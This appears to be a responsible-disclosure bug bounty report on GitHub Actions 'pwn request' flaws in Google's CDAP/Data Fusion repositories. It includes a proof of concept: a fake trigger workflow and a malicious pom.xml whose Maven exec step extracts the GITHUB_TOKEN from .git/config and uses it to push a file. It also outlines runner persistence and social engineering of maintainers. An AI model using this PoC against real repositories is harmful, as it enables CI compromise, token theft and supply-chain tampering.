Summary:
Google Cloud Data Fusion, built upon the open-source CDAP code, has multiple GitHub Actions "pwn request" vulnerabilities allowing RCE and build artifact compromise
Program:
OSS VRP
URL:
https://github.com/data-integrations/google-cloud/blob/develop/.github/workflows/build.yml
Vulnerability type:
Remote Code Execution (RCE)
Details
Video walk-through
I made a video walk-through demonstrating that attack:
https://drive.google.com/file/d/1OOEEMrQW9bJS7PrbyybKheabUBTKuT-c/view?usp=sharing
Introduction
Google Cloud Data Fusion is built upon the open-source CDAP code, developed by Cask Data and acquired by Google in 2018. The CDAP project, maintained by Google staff, exists today within the GitHub organization "data-integrations," which is clearly labeled as an official Google product and in scope for the Google Bug Bounty program (
https://github.com/data-integrations/google-cloud/blob/develop/SECURITY.md
).
Observations
GitHub Actions Workflows:
Most public repositories in the "data-integrations" organization use GitHub Actions workflows.
These workflows DO NOT trigger on the more risky
pull_request_target
event.
The "cdapio" GitHub organization is also clearly labeled "CDAP is now part of Google Cloud" and exhibits the same problems that we highlight below.
Workflow Run Triggers:
Approximately 22 repositories have workflows triggering on the
workflow_run
event without a
branches:
filter. If we also consider the "cdapio" organization there are 5 more repositories also affected there.
These workflows use the
actions/checkout@v3
step to check out untrusted code from incoming pull requests, by specifying
${{ github.event.workflow_run.head_sha }}
.
Trigger Workflow:
The
workflows are triggered by a workflow named
Trigger build
(
trigger.yml
), which exists in all those repositories.
Comments in
indicate a clear understanding of the risks on the part of the engineers who wrote the workflow, by requiring manual review and a PR label
build
to run Maven tests on untrusted code from forks.
Vulnerability Exploitation
An attacker can exploit this setup by:
Submitting a Malicious Pull Request:
Create a draft PR containing a new
.github/workflows/whatever.yml
that triggers on
on: pull_request
, with the
name: Trigger Build
This workflow will obviously not have access to any secret and simply needs to succeed (i.e.,
exit 0
Triggering the Build Workflow:
The successful execution of the malicious workflow triggers the
build.yml
workflow.
This classic "pwn request" scenario allows the attacker to exploit Maven's interpretation of a maliciously crafted
pom.xml
Potential Consequences:
workflow inherits the old insecure defaults without explicit
GITHUB_TOKEN
permissions:
down-scoping, meaning we could confirm by looking at actions logs that it has full
write
access.
Even with settings like "Require approval for first-time contributors," a threat actor can social engineer the repo maintainer to accept a benign PR, promoting their author association from "first-time contributor" to "contributor," then enabling stealthy attack execution.
Self-Hosted Runner Risks:
Most of those workflows run on a self-hosted runner labeled
k8s-runner-build
Evidence found in run logs indicate that the self-hosted runner is almost certainly non-ephemeral, allowing potential "Runner-on-Runner" attacks where an attacker can implant their own self-hosted runner on the same VM and use it as a C2 to establish persistence.
POC
Bogus Workflow
name: Trigger build
jobs:
whatever:
runs-on: ubuntu-latest
steps:
- run: exit 0
Maliciously craft pom.xml
...
<profile>
<id>cloudBuild</id>
<activation>
<property><name>cloudBuild</name></property>
</activation>
<build>
<plugins>
<plugin>
<groupId>org.codehaus.mojo</groupId>
<artifactId>exec-maven-plugin</artifactId>
<version>3.1.1</version>
<executions>
<execution>
<id>run-after-clean</id>
<phase>clean</phase>
<goals>
<goal>exec</goal>
</goals>
<configuration>
<executable>/bin/bash</executable>
<arguments>
<argument>-c</argument>
<argument>export GH_TOKEN=$(cat .git/config | grep extraheader | cut -d' ' -f5 | base64 --decode | cut -d: -f2); gh api --method PUT /repos/$GITHUB_REPOSITORY/contents/pwned.txt -f branch=feature/next-release -f message=pwn -f content=cHduZWQgYnkgdmlrb3JpdW0K</argument>
</arguments>
</configuration>
</execution>
</executions>
</plugin>
Attack scenario
Any GitHub user has the ability to open a pull request from a fork against the repositories to exploit this vulnerability. This includes both first-time contributors and existing contributors.  The initial exploitation does not require any special permissions or secrets.
What They Gain When Doing So
By exploiting this vulnerability, an attacker can:
Trigger a workflow that runs untrusted code in the context of the GitHub Actions workflow with access to build-time secrets.
Execute arbitrary code, which ultimately allow compromising signed down-stream artifacts on Maven Central.
Allow further manipulation of the repository, such as modifying existing PRs, pushing malicious code, or deleting evidence of the attack of the attack.
Establish persistence on the non-ephemeral self-hosted runner to potentially execute further attacks within the infrastructure.